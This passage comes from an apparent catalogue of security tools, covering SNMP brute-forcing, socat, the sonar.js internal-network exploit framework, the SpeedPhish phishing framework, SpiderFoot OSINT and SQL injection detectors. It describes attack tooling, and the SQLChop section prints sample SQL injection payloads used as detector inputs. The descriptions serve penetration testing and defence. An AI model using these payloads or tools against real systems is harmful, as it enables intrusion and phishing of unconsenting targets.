--timeout=TIMEOUT Wait time for UDP response (in seconds)
--delay=DELAY Wait time after all packets are send (in
seconds)
--iplist=LFILE IP list file
--verbose, -v Verbose output
Automation
--bruteonly, -b Do not try to enumerate - only bruteforce

--auto, -a Non Interactive Mode
--no-colours No colour output
Operating Systems
--windows Enumerate Windows OIDs (snmpenum.pl)

--linux Enumerate Linux OIDs (snmpenum.pl)
--cisco Append extra Cisco OIDs (snmpenum.pl)
Alternative Options
--stdin, -s Read communities from stdin

--community=COMMUNITY, -c COMMUNITY Single
Community String to use
--sploitego Sploitego's bruteforce method
Features
Brute forces both version 1 and version 2c SNMP

community strings
Enumerates information for CISCO devices or if specified
for Linux and Windows operating systems.
Identifies RW community strings

Tries to download the router config (metasploit module).
If the CISCO config file is downloaded, shows the plaintext
passwords (metasploit module) and tries to crack hashed
passords with John the Ripper
DownloadSNMP Brute
SOCAT - MULTIPURPOSE RELAY (SOCKET CAT)
Socatis autility similar to the venerable Netcat that works over
a number of protocols and through a files, pipes, devices
(terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP,
TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It
provides forking, logging, and dumping, different modes for
interprocess communication, and many more options. It can be
used, for example, as a TCP relay (one-shot or daemon), as a
daemon-based socksifier, as a shell interface to Unix sockets,
as an IP6 relay, for redirecting TCP-oriented programs to a
serial line, or to establish a relatively secure environment (su
and chroot) for running client or server shell scripts with
network connections.
Socat is a command line based utility that establishes two
bidirectional byte streams and transfers data between them.
Because the streams can be constructed from a large set of
different types of data sinks and sources (see address types),
and because lots of address options may be applied to the
streams, socat can be used for many different purposes.
Filan is a utility that prints information about its active file
descriptors to stdout. It has been written for debugging socat,
but might be useful for other purposes too. Use the -h option to
find more infos.
Procan is a utility that prints information about process

parameters to stdout. It has been written to better understand
some UNIX process properties and for debugging socat, but
might be useful for other purposes too.
The life cycle of a socat instance typically consists of four
phases.
In the init phase, the command line options are parsed and
logging is initialized.
During the open phase, socat opens the first address and
afterwards the second address. These steps are usually
blocking; thus, especially for complex address types like socks,
connection requests or authentication dialogs must be
completed before the next step is started.
In the transfer phase, socat watches both streams' read and
write file descriptors via select() , and, when data is available
on one side and can be written to the other side, socat reads it,
performs newline character conversions if required, and writes
the data to the write file descriptor of the other stream, then
continues waiting for more data in both directions.
When one of the streams effectively reaches EOF, the closing
phase begins. Socat transfers the EOF condition to the other
stream, i.e. tries to shutdown only its write stream, giving it a
chance to terminate gracefully. For a defined time socat
continues to transfer data in the other direction, but then closes
all remaining channels and terminates.
OPTIONS
Socat provides some command line options that modify the

behaviour of the program. They have nothing to do with so
called address options that are used as parts of address
specifications.
-V
Print version and available feature information to stdout, and

exit.
-h | -?
Print a help text to stdout describing command line options and

available address types, and exit.
-hh | -??
Like -h, plus a list of the short names of all available address
options. Some options are platform dependend, so this output
is helpful for checking the particular implementation.
-hhh | -???
Like -hh, plus a list of all available address option names.

-d
Without this option, only fatal and error messages are

generated; applying this option also prints warning messages.
See DIAGNOSTICS for more information.
-d -d
Prints fatal, error, warning, and notice messages.

-d -d -d
Prints fatal, error, warning, notice, and info messages.

-d -d -d -d
Prints fatal, error, warning, notice, info, and debug messages.

-D
Logs information about file descriptors before starting the

transfer phase.
-ly[<facility>]
Writes messages to syslog instead of stderr; severity as

defined with -d option. With optional <facility>, the syslog type
can be selected, default is "daemon". Third party libraries might
not obey this option.
-lf <logfile>
Writes messages to <logfile> [filename] instead of stderr. Some

third party libraries, in particular libwrap, might not obey this
option.
-ls
Writes messages to stderr (this is the default). Some third party
libraries might not obey this option, in particular libwrap

appears to only log to syslog.
-lp<progname>
Overrides the program name printed in error messages and

used for constructing environment variable names.
-lu
Extends the timestamp of error messages to microsecond

resolution. Does not work when logging to syslog.
-lm[<facility>]
Mixed log mode. During startup messages are printed to stderr;

when socat starts the transfer phase loop or daemon mode
(i.e. after opening all streams and before starting data transfer,
or, with listening sockets with fork option, before the first accept
call), it switches logging to syslog. With optional <facility>, the
syslog type can be selected, default is "daemon".
-lh
Adds hostname to log messages. Uses the value from

environment variable HOSTNAME or the value retrieved with
uname() if HOSTNAME is not set.
-v
Writes the transferred data not only to their target streams, but
also to stderr. The output format is text with some conversions
for readability, and prefixed with "> " or "< " indicating flow
directions.
-x
Writes the transferred data not only to their target streams, but
also to stderr. The output format is hexadecimal, prefixed with
"> " or "< " indicating flow directions. Can be combined with -v .
-b<size>
Sets the data transfer block <size> [size_t]. At most <size>

bytes are transferred per step. Default is 8192 bytes.
-s
By default, socat terminates when an error occurred to prevent

the process from running when some option could not be
applied. With this option, socat is sloppy with errors and tries to
continue. Even with this option, socat will exit on fatals, and will
abort connection attempts when security checks failed.
-t<timeout>
When one channel has reached EOF, the write part of the other
channel is shut down. Then, socat waits <timeout> [timeval]
seconds before terminating. Default is 0.5 seconds. This
timeout only applies to addresses where write and read part
can be closed independently. When during the timeout interval
the read part gives EOF, socat terminates without awaiting the
timeout.
-T<timeout>
Total inactivity timeout: when socat is already in the transfer

loop and nothing has happened for <timeout> [timeval] seconds
(no data arrived, no interrupt occurred...) then it terminates.
Useful with protocols like UDP that cannot transfer EOF.
-u
Uses unidirectional mode. The first address is only used for

reading, and the second address is only used for writing
(example).
-U
Uses unidirectional mode in reverse direction. The first address

is only used for writing, and the second address is only used for
reading.
-g
During address option parsing, don't check if the option is

considered useful in the given address environment. Use it if
you want to force, e.g., appliance of a socket option to a serial
device.
-L<lockfile>
If lockfile exists, exits with error. If lockfile does not exist,

creates it and continues, unlinks lockfile on exit.
-W<lockfile>
If lockfile exists, waits until it disappears. When lockfile does

not exist, creates it and continues, unlinks lockfile on exit.
-4
Use IP version 4 in case that the addresses do not implicitly or

explicitly specify a version; this is the default.
-6
Use IP version 6 in case that the addresses do not implicitly or

explicitly specify a version.
Download Socat
SOFTAVIR - ANTIVIRUS FOR WINDOWS BASED ON
WHITELISTS
SoftAvir is a security tool that ensures complete protection for

your computer by creating a whitelist. The user select the only
programs that can be run avoiding in this way the execution of
any other unwanted program.
How does it work?
Softavir is the first antimalware solution that relies operation in

advanced cryptographic whitelisting technology.
After installed, the user must add the programs that can be run.
Softavir will not allow the execution of any program that has not
been added to the list (including viruses, tojans and other
malware).
Who is it for?
Softavir is recommended to Microsoft Windows users. The

current version is compatible with Microsoft Windows x86
operating systems. Soon will come out a version for Microsoft
Windows x64 operating systems.
Main advantages:
100% protection against new threats.

Does not require updates.
Improved software management.
Easy maintenance of your equipment.
Avoids the need of regular formatting.
DownloadSoftavir
SONAR.JS - FRAMEWORK FOR IDENTIFYING AND
LAUNCHING EXPLOITS AGAINST INTERNAL NETWORK
HOSTS
A framework for identifying and launching exploits against
internal network hosts. Works via WebRTC IP enumeration,
WebSocket host scanning, and external resource fingerprinting.
How does it work?
Upon loading the sonar.js payload in a modern web browser

the following will happen:
sonar.js will use WebRTC to enumerate what internal IPs
the user loading the payload has.
sonar.js then attempts to find live hosts on the internal
network via WebSockets.
If a live host is found, sonar.js begins to attempt to
fingerprint the host by linking to it via <img src="x"> and
<link rel="stylesheet" type="text/css" href="x">
and hooking the onload event. If the expected resources
load successfully it will trigger the pre-set JavaScript

callback to start the user-supplied exploit.
If the user changes networks, sonar.js starts the process
all over again on the newly joined network.
Fingerprints
sonar.js works off of a database of fingerprints. A fingerprint is

simply a list of known resources on a device that can be linked
to and detected via onload. Examples of this include images,
CSS stylesheets, and even external JavaScript.
An example fingerprint database can be seen below:
var fingerprints = [
{
'name': "ASUS RT-N66U",
'fingerprints': ["/images/New_ui/
asustitle.png","/images/loading.gif","/images/
alertImg.png","/images/New_ui/networkmap/line_one.png","/
images/New_ui/networkmap/lock.png","/images/New_ui/
networkmap/line_two.png","/index_style.css","/
form_style.css","/NM_style.css","/other.css"],
'callback': function( ip ) {
// Insert exploit here
},
},
{
'name': "Linksys WRT54G",
'fingerprints': ["/UILinksys.gif","/UI_10.gif","/
UI_07.gif","/UI_06.gif","/UI_03.gif","/UI_02.gif","/
UI_Cisco.gif","/style.css"],
'callback': function( ip ) {
// Insert exploit here
},
},
]
The above database contains fingerprints for two devices, the

ASUS RT-N66U WiFi router and the Linksys WRT54G WiFi
router.
Each database entry has the following:
name: A field to identify what device the fingerprint is for.
This could be something like HP Officejet 4500 printer or
Linksys WRT54G Router.
fingerprints: This is an array of relative links to
resources such as CSS stylesheets, images, or even
JavaScript files. If you expect these resources to be on a
non-standard port such as 8080, set the resource with the
port included: :8080/unique.css. Keep in mind using

external resources with active content such as JavaScript
is dangerous as it can interrupt the regular flow of
execution.
callback: If all of these resources are found to exist on
the enumerated host then the callback function is called
with a single argument of the device's IP address.
By creating your own fingerprints you can build custom exploits
that will be launched against internal devices once they are
detected by sonar.js. Common exploits include things such as
Cross-site Request Forgery (CSRF), Cross-site Scripting
(XSS), etc. The idea being that you can use these
vulnerabilities to do things such as modifying router DNS
configurations, dumping files from an internal fileserver, and
more.
For an easier way to create fingerprints, see the following
Chrome extension which generates fingerprint template code
automatically for the page you're on:
Click Here to Install Chrome Extension
What can be done using sonar.js?
By using sonar.js a pentesting team can build web exploits

against things such as internal logging servers, routers,
printers, VOIP phones, and more. Due to internal networks
often being less guarded, attacks such as CSRF and XSS can
be powerful to take over the configurations of devices on a
hosts internal network.
DownloadSonar.js
SPARKYLINUX - LIGHTWEIGHT & FAST DEBIAN-BASED
LINUX DISTRIBUTION
SparkyLinux is a GNU/Linux distribution created on the testing

branch of Debian. It features customized lightweight desktops
(like E19, LXDE and Openbox), multimedia plugins, selected
sets of apps and own custom tools to ease different tasks.
Why Sparky?
SparkyLinux is a Debian-based Linux distribution which

provides ready to use, out of the box operating system with a
set of slightly customized lightweight desktops.
Sparky is targeted to all the computers users who want replace
existing, proprietary driven OS to open-sourced.

Sparky is also targeted to two different groups of users:
Full Editions with all the tools, codecs, plugins and
drivers preinstalled to the users who want to have
everything ready and works from the first systems run
Base Editions with minimal set of tools to advanced
users who like to set up everything as they want
Main features of Sparky
Debian testing based

rolling release
lightweight, fast & simple
set of desktops to choose: LXDE, Enlightenment, JWM,
KDE, LXQt, Openbox, MATE, Xfce
ultra light base edition with Openbox or JWM desktops
special gaming edition: GameOver
CLI Edition (no X) for building customized desktop
most wireless and mobile network cards supported
set of selected applications, multimedia codecs and
plugins
own repository with a large set of additional applications
easy hard drive / USB installation
In general, Sparky is not targeted to Linux beginners, rather to
users with some amount of Linux knowledge.
Anyway, the Linux beginners are welcome too our forums is
open for any question.
Download SparkyLinux
SPARTA - NETWORK INFRASTRUCTURE PENETRATION
TESTING TOOL
SPARTA is a python GUI application which simplifies network

infrastructure penetration testing by aiding the penetration
tester in the scanning and enumeration phase. It allows the
tester to save time by having point-and-click access to his
toolkit and by displaying all tool output in a convenient way. If
little time is spent setting up commands and tools, more time
can be spent focusing on analysing results.
Features
Run nmap from SPARTA or import nmap XML output.

Transparent staged nmap: get results quickly and achieve
thorough coverage.
Configurable context menu for each service. You can
configure what to run on discovered services. Any tool that can
be run from a terminal, can be run from SPARTA.
You can run any script or tool on a service across all the
hosts in scope, just with a click of the mouse.
Define automated tasks for services (ie. Run nikto on every
HTTP service, or sslscan on every ssl service).
Default credentials check for most common services. Of
course, this can also be configured to run automatically.

Identify password reuse on the tested infrastructure. If any
usernames/passwords are found by Hydra they are stored in
internal wordlists which can then be used on other targets in
the same network (breaking news: sysadmins reuse
passwords).
Ability to mark hosts that you have already worked on so that
you dont waste time looking at them again.
Website screenshot taker so that you dont waste time on
less interesting web servers.
Download SPARTA
SPEEDTEST - COMMAND LINE INTERFACE FOR TESTING
INTERNET BANDWIDTH
speedtest-cli is a command line interface for testing internet

bandwidth using speedtest.net
Installation
pip / easy_install
pip install speedtest-cli
or
easy_install speedtest-cli
Github
pip install git+https://github.com/sivel/speedtestcli.git
or
git clone https://github.com/sivel/speedtest-cli.git
python speedtest-cli/setup.py install
Just download (Like the way it used to be)

wget -O speedtest-cli https://raw.githubusercontent.com/
sivel/speedtest-cli/master/speedtest_cli.py
chmod +x speedtest-cli
or
curl -Lo speedtest-cli https://raw.githubusercontent.com/
sivel/speedtest-cli/master/speedtest_cli.py
chmod +x speedtest-cli
Usage
$ speedtest-cli -h
usage: speedtest-cli [-h] [--bytes] [--share] [--simple]
[--list]
[--server SERVER] [--mini MINI] [-source SOURCE]
[--timeout TIMEOUT] [--version]
Command line interface for testing internet bandwidth
using speedtest.net.
---------------------------------------------------------
----------------https://github.com/sivel/speedtest-cli
optional arguments:
-h, --help
--bytes
Display values in bytes instead of
bits. Does not affect

the image generated by --share
--share
Generate and provide a URL to the
speedtest.net share
results image
--simple
Suppress verbose output, only show
basic information
--list
Display a list of speedtest.net
servers sorted by
distance
--server SERVER
Specify a server ID to test against
--mini MINI
URL of the Speedtest Mini server
--source SOURCE
Source IP address to bind to
--timeout TIMEOUT
HTTP timeout in seconds. Default 10
--version
Show the version number and exit
Download Speedtest
SPF - SPEEDPHISH FRAMEWORK
SPF (SpeedPhish Framework) is a python tool designed to

allow for quick recon and deployment of simple social
engineering phishing exercises.
Requirements:
dnspython
twisted
PhantomJS
Usage:
usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [-all] [--test] [-e]
[-g] [-s] [--simulate] [-w] [-W] [-d
<domain>]
[-c <company's name>] [--ip <IP address>]
[-v] [-y]
optional arguments:
-h, --help
-d <domain>
domain name to phish
-c <company's name>
name of company to phish
--ip <IP address>
IP of webserver defaults to
[192.168.1.124]
-v, --verbosity
increase output verbosity
input files:
-f <list.txt>
file containing list of email
addresses
-C <config.txt>
config file
enable flags:
--all
enable ALL flags... same as (-e -g
-s -w)
--test
emails... same as
enable all flags EXCEPT sending of
(-e -g --simulate -w -y -v -v)

-e
enable external tool utilization
-g
enable automated gathering of
email targets
-s
enable automated sending of
phishing emails to targets

--simulate
simulate the sending of phishing
emails to targets
-w
enable generation of phishing web
sites
-W
leave web server running after
termination of spf.py
misc:
-y
automatically answer yes to all
questions
Execution:
cd spf
python spf.py --test -d example.com
or to just test the websites:

cd spf
python web.py default.cfg
Misc
Video of sample usage
An error occurred.
BsidesKnox 2015 video
An error occurred.
Download SpeedPhish Framework

SPIDERFOOT V2.6.1 - OPEN SOURCE INTELLIGENCE
AUTOMATION
SpiderFoot is an open source intelligence automation tool. Its

goal is to automate the process of gathering intelligence about
a given target.
Purpose
There are three main areas where SpiderFoot can be useful:

1. If you are a pen-tester, SpiderFoot will automate the
reconnaisance stage of the test, giving you a rich set of
data to help you pin-point areas of focus for the test.

2. Understand what your network/organisation is openly
exposing to the outside world. Such information in the
wrong hands could be a significant risk.
3. SpiderFoot can also be used to gather threat intelligence
about suspected malicious IPs you might be seeing in
your logs or have obtained via threat intelligence data
feeds.
Features
Utilises a shedload of data sources; over 40 so far and

counting, including SHODAN, RIPE, Whois, PasteBin,
Google, SANS and more.
Designed for maximum data extraction; every piece of

data is passed on to modules that may be interested, so
that they can extract valuable information. No piece of
discovered data is saved from analysis.
Runs on Linux and Windows. And fully open-source so

you can fork it on GitHub and do whatever you want with
it.
Visualisations. Built-in JavaScript-based visualisations or

export to GEXF/CSV for use in other tools, like Gephi for
instance.
Web-based UI. No cumbersome CLI or Java to mess with.

Easy to use, easy to navigate. Take a look through the
gallery for screenshots.
Highly configurable. Almost every module is configurable

so you can define the level of intrusiveness and
functionality.
Modular. Each major piece of functionality is a module,

written in Python. Feel free to write your own and submit
them to be incorporated!
SQLite back-end. All scan results are stored in a local

SQLite database, so you can play with your data to your
hearts content.
Simultaneous scans. Each footprint scan runs as its own

thread, so you can perform footprinting of many different
targets simultaneously.
So much more.. check out the documentation for more

information.
Data Sources
This is an ever-growing list of data sources SpiderFoot uses to

gather intelligence about your target. A few require API keys
but they are freely available.
Source
Location
Notes
abuse.c
h
http://www.abuse.ch
Various malware
trackers.
AdBlock
https://easylistdownloads.adblockplus.or
g/easylist.txt
AdBlock pattern
matches
AlienVa
ult
https://
reputation.alienvault.com
AlienVaults IP
reputation
database.
Autoshu
n.org
http://www.autoshun.org
Blacklists.
AVG
Site
Safety
Report
http://
www.avgthreatlabas.com
Site safety
checker.
Bing
http://www.bing.com
Scraping but
future version to
also use API.
Blocklist
.de
http://lists.blocklist.de
Blacklists.
Checku
sernam
es.com
http://
www.checkusernames.co
m
Look up
username
availability on
popular sites.
DNS
Your configured DNS

server.
Defaults to your
local DNS but can
be configured to
whatever IP
address you
supply
SpiderFoot.
Domain
Tools
http://
www.domaintools.com
DroneB
L
http://www.dronebl.org
DuckDu
ckGo
http://
www.duckduckgo.com
Facebo
ok
http://www.facebook.com
Scraping but
future version to
also use API.
FreeGe
oIP
http://freegeoip.net
Github
http://www.github.com
Google
http://www.google.com
Scraping but
future version to
also use API.
Google
+
http://plus.google.com
Scraping but
future version to
also use API.
Google
Safe
Browsin
g
http://www.google.com/
safebrowsing
Site safety
checker.
IPCat
https://
raw.githubusercontent.co
m/client9/ipcat/master/
datacenters.csv
IP Categorisation.
LinkedI
n
http://www.linkedin.com
Scraping but
future version to
also use API.
malc0d
e.com
http://malc0de.com
Blacklists.
malwar
edomai
nlist.co
m
http://
www.malwaredomainlist.c
om
Blacklists.
malwar
edomai
ns.com
http://
www.malwaredomains.co
m
Blacklists.
McAfee
SiteAdvi
sor
http://
www.siteadvisor.com
Site safety
checker.
NameDr
oppers
http://
www.namedroppers.org
Notepa
d.cc
http://www.notepad.cc
Nothink.
org
http://www.nothink.org
Blacklists.
Onion.C
ity
http://onion.city
Search engine for

the dark web.
OpenBL
http://www.openbl.org
Blacklists.
PasteBi
n
http://www.pastebin.com
Achieved through
Google scraping.
Pastie
http://www.pastie.org
PGP
Servers
http://pgp.mit.edu/pks/
PGP public keys.
PhishTa
nk
http://www.phishtank.org
Identified phishing
sites.
Project
Honeyp
ot
http://
www.projecthoneypot.org
Blacklists. API
key needed.
PunkSP
IDER
http://www.punkspider.org
RIPE/
ARIN
http://stat.ripe.net/
Robtex
http://www.robtex.com
SANS
ISC
http://isc.sans.edu
Internet Storm
Center IP
reputation
database.
SHODA
N
http://www.shodanhq.com
API key needed.
SORBS
http://www.sorbs.net
Blacklists.
SpamH
aus
http://www.spamhaus.org
Blacklists.
ThreatE
xpert
http://
www.threatexpert.com
Blacklists.
TOR
Node
List
http://
torstatus.blutmagie.de
TotalHa
sh.com
http://www.totalhash.com
Domains/IPs
used by malware.
UCEPR
OTECT
http://www.uceprotect.net
Blacklists.
VirusTot
al
http://www.virustotal.com
Domains/IPs
used by malware.
API key needed.
WayBac
k
Machin
e
http://www.archive.org
Whois
Various
XSSpos
ed
http://www.xssposed.org
Yahoo
http://www.yahoo.com
Whois servers for

different TLDs.
Scraping but
future version to
also use API.
Zone-H
http://www.zone-h.org
Easy to get blacklisted. Log onto

the site in a
browser from the
IP youre
scanning from
first and enter the
CAPTCHA, then it
should be fine.
Download SpiderFoot v2.6.1

SPTOOLKIT REBIRTH - PHISHING EDUCATION TOOLKIT
The spt (rebirth) project is an open source phishing education

toolkit that aims to help in securing the mind as opposed to
securing computers. Organizations spend billions of dollars
annually in an effort to safeguard information systems, but

spend little to nothing on the under trained and susceptible
minds that operate these systems, thus rendering most
technical protections instantly ineffective. A simple, targeted
link is all it takes to bypass the most advanced security
protections. The link is clicked, the deed is done.
spt was developed from the ground up to provide a simple and
easy to use framework to identify your weakest links so that
you can patch the human vulnerability. If the spt project sounds
interesting to you, please consider downloading it for evaluation
in your own organization. Feedback is welcomed and always
appreciated.
INSTALLATION
The Basics
1. Create and configure the MySQL database. spt will need a

MySQL database to house its data, so go ahead and
create that database and configure the associated user
account for the new database with ALL PRIVILEGES
assigned to it. Be sure you record the database name,
user name and password in a safe place, you'll need it
soon to install spt!
2. Ensure you have PHP 5.4
3. Extract the spt files from the archive.
4. Create a new directory on your web server, such as "spt"
and upload the files to the directory.
Install spt
1. Open your web browser and navigate to the location

where you uploaded the files and browse to install.php.
For example, http://www.myhost.com/spt/install.php. If you
accidentally just go to the root of the folder you placed the
files in, you will be prompted to start the installation by
clicking the right pointing arrow.
2. When prompted to accept the GNU General Public

License, click the "I Agree!" button. For reference, you can
read the full text of the license in the license.htm file
included in the root of the extracted files.
3. On the next page, you will get feedback on the readiness
of your server to install the spt. You can learn more about
any failed items by hovering over the icon. Click the
Proceed! button if all checks passed, or click the
Proceed Anyways button if one of the checks failed and
you have verified that the spt installer is reporting
incorrectly.
4. On the next page, you will need to provide those database
details from earlier. The default server and database ports
are provided, be sure to change them if your installation
will require something else. Enter in the remaining
required information and click the "Install Database!"
button to get things moving along.
5. If all goes well, you will see a listing of tables that have
been successfully created. Click "Continue!" to move on.
6. If instead you see an error indicated, click the "<back"
button to go back and enter the database information
again.
7. Now it's time to create your first user, for you! Enter your
first and last name, email address and password and click
the "Create User" button to continue on.
8. If you receive any errors, such as for an invalid email
address or a password that does not meet the complexity
requirements, click the "<back" button and try it again.
9. Once you enter the required information successfully, you
will receive confirmation. Click the "Proceed to Login"
button to get logged into the spt!
10. Now it's time to login using the email address and
password you entered in the previous step. See, that was
easy!
DownloadSptoolkit Rebirth
SQLASSIE - EFFECTIVE DATABASE SECURITY
SQLassie is a free MySQL database firewall that prevents SQL

injection attacks at runtime. SQLassie uses Bayesian classifiers
to determine the likelihood of a query being an attack. This
approach produces fewer false positives than other similar
approaches.
Security
SQLassie prevents injection attacks before they have a chance
to run.
Instantaneous
Protection is instantaneous - just point your web applications at
SQLassie and you're done!
Analysis
SQLassie tracks suspicious queries, classifies them based on

their intent, and logs this information for further review.
Options
SQLassie can be used as a passive intrusion detection system
or as an active intrusion prevention system.
Support
SQLassie is free and being constantly updated and improved.
Have a problem or feature request? Let us know!
Usage
SQLassie currently only supports MySQL. To start SQLassie,

you'll need to configure how SQLassie connects to the MySQL
server, start SQLassie listening on a different port that is now
protected, and then configure your applications to connect
through this alternate port instead of directly to MySQL.
As an example, consider a scenario where you have a MySQL
database engine running and listening for connections on the
domain socket /var/run/mysql/mysqld.sock and are running
a MediaWiki installation.
First, start SQLassie using
./sqlassie -s /var/run/mysql/mysqld.sock -l 3307
Then, edit MediaWiki's configuration file LocalSettings.php

connect to port 3307.
$wgDBServer = "127.0.0.1:3307"
Note that you can't use localhost here; by default, MySQL

interprets localhost as a request to use the direct database
domain socket connection, and most web applications behave
this way as well. Therefore, you have to use the explicit string
127.0.0.1 in order to force connections to go through the TCP
port. Check your application's documentation for more
information.
DownloadSQLassie
SQLCHOP - SQL INJECTION DETECTION ENGINE
SQLChop is a novel SQL injection detection engine built on top

of SQL tokenizing and syntax analysis. Web input (URLPath,
body, cookie, etc.) will be first decoded to the raw payloads that
web app accepts, then syntactical analysis will be performed on
payload to classify result. The algorithm behind SQLChop is
based on compiler knowledge and automata theory, and runs
at a time complexity of O(N).
Documentation
http://sqlchop.chaitin.com/doc.html
Dependencies
The SQLChop alpha testing release includes the c++ header
and shared object, a python library, and also some sample

usages. The release has been tested on most linux
distributions.
If using python, you need to install protobuf-python, e.g.:
$ sudo pip install protobuf
If using c++, you need to install protobuf, protobuf-compiler

and protobuf-devel, e.g.:
$ sudo yum install protobuf protobuf-compiler protobufdevel
Build
Download latest release at https://github.com/chaitin/

sqlchop/releases
Make
Run python2 test.py or LD_LIBRARY_PATH=./ ./
sqlchop_test
Enjoy!
SQLChop Python API
The current alpha testing release is provided as a python

library. C++ headers and examples will be released soon.
The following APIs are the main interfaces SQLChop export.
is_sqli
Given a raw payload, determine whether the payload is an SQL
injection payload.
Parameter: string
Return value: bool, return True for SQLi payload, return
False for normal case.
>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.is_sqli('SELECT 1 From users')
True
>>> detector.is_sqli("' or '1'='1")

True
>>> detector.is_sqli('select the best student from
classes as the student union representative')
False
>>>
detector.is_sqli('''(select(0)from(select(sleep(0)))v)/
*'+(select(0)from(select(sleep(12)))v)+'"+
(select(0)from(select(sleep(0)))v)+"*/''')
True
classify
Given a web application input, classify API will decode the
input and find possible SQL injection payload inside. If SQLi
payload found, payloads will be listed.
Parameter 1: object with following keys
1. urlpath: string, the urlpath of web request
2. body: string, the http body of POST/PUT request
3. cookie: string, the cookie content of web request
4. raw: string, other general field that needs general
decoding.
Parameter 2: detail, if detail is True, detailed payload list
will be returned, if False, only result will be returned,
which runs faster.
Return: an object contains result and payloads
1. result: int, positive value indicates the web request
contains sql injection payload
2. payloads: list of objects containing key, score, value
and source
key: string, reserved
source: string, shows where this payload is
embed in original web request and how the
payload is decoded
value: decoded sqli payload

score: the score of the decoded sqli payload
Examples here:
>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.classify({'urlpath': '/tag/sr/news.asp?
d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGN
ocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==
' }, True)
>>>
{
'payloads': [{
'key': '',
'score': 4.070000171661377,
'source': 'urlpath: querystring_decode b64decode
url_decode ',
'value': '-1 and 1=2 union select 1,2,3,chr(106),
5,6,7,8,9,10,11,12 from admin'
}],
'result': 1
}
>>> detector.classify({'body':
'opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69
&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&a
rrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&
arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&
arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&ar
rs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arr
s1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs
1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arr
s1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arr
s1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arr
s1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&a
rrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&a
rrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&a
rrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&
arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&
arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&ar
rs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs
1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1[
]=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]=
41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39'}, True)
>>>
{
'payloads': [{
'key': '',
'score': 3.9800000190734863,
'source': 'body: querystring_decode ',
'value': "SELECT * From Table WHERE Name='SQL
inject' and Password='' and Corp='' or 1=(SELECT
@@VERSION)-- '"
}, {
'key': '',
'score': 2.0899999141693115,
'value': "'SQL inject' and Password"
}, {
'key': '',
'score': 2.180000066757202,
'value': "(SELECT @@VERSION)-- '"

}, {
'key': '',
'score': 0.0,
'value': 'saveedit'
}],
'result': 1
}
Customization
The is_sqli API (in sqlchop.py) detects SQLi using score 2.1
as threshold, you can adjust this threshold according to your
usage scenario.
def is_sqli(self, payload):
ret = self.score_sqli(payload)
return ret > 2.1
# here you can modify and test
this threshold
def classify(self, request, detail=False):
...
DownloadSQLChop
SQLIPY - PLUGIN FOR BURP SUITE THAT INTEGRATES
SQLMAP USING THE SQLMAP API
SQLiPy is a Python plugin for Burp Suite that integrates

SQLMap using the SQLMap API.
SQLMap comes with a RESTful based server that will execute

SQLMap scans. This plugin can start the API for you or connect
to an already running API to perform a scan.
Requirements
Jython 2.7 beta, due to the use of json

Java 1.7 or 1.8 (the beta version of Jython 2.7 requires this)
Usage
SQLiPy relies on a running instance of the SQLMap API server.

You can manually start the server with:
python sqlmapapi.py -s -H <ip> -p <port>
Or, you can use the SQLMap API tab to select the IP/Port on
which to run, as well as the path to python and sqlmapapi.py on
your system.
Once the SQLMap API is running, it is just a matter of right
mouse clicking in the 'Request' sub tab of either the Target or
Proxy main tabs and choosing 'SQLiPy Scan'.
This will populate the SQLMap Scanner tab of the plugin with
information about that request. Clicking the 'Start Scan' button
will execute a scan.
If the page is vulnerable to SQL injection, then a thread from
the plugin will poll the results and add them to the Scanner
Results tab.
Read more here.
DownloadSQLiPy
SQLMAP-WEB-GUI - WEB GUI TO DRIVE NEAR FULL
FUNCTIONALITY OF SQLMAP
PHP Frontend to work with the SQLMAP JSON API Server

(sqlmapapi.py) to allow for a Web GUI to drive near full
functionality of SQLMAP!
Here is a few quick videos to show that almost all of your usual
SQLMAP command line functionality is still possible via this
Web GUI.
Demo against: Windows 2003 Server, IIS/6.0 + ASP + MSSQL 2005
An error occurred.

Demo against: Linux (CentOS), Apache, MySQL, PHP
An error occurred.
Requirements:
Linux, Apache, PHP (check your favorite distro's wiki or

forum pages, or use google)
PHP 5.3+ is suggested, older versions not tests so
mileage may vary
Python and any SQLMAP dependencies (refer to their wiki
for any help there)
Clone this repo to your machine
Edit the sqlmap/inc/config.php file so the paths all
point to the right locations on your system
Copy the entire sqlmap/ directory and contents to
your web root directory (cd SQLMAP-Web-GUI &&
cp -R sqlmap/ /var/www/)
When you want to use, simply fire up the sqlmap API
server (python /home/user/tools/sqlmap/
sqlmapapi.py -s)
Then you can navigate to the Web GUI address in
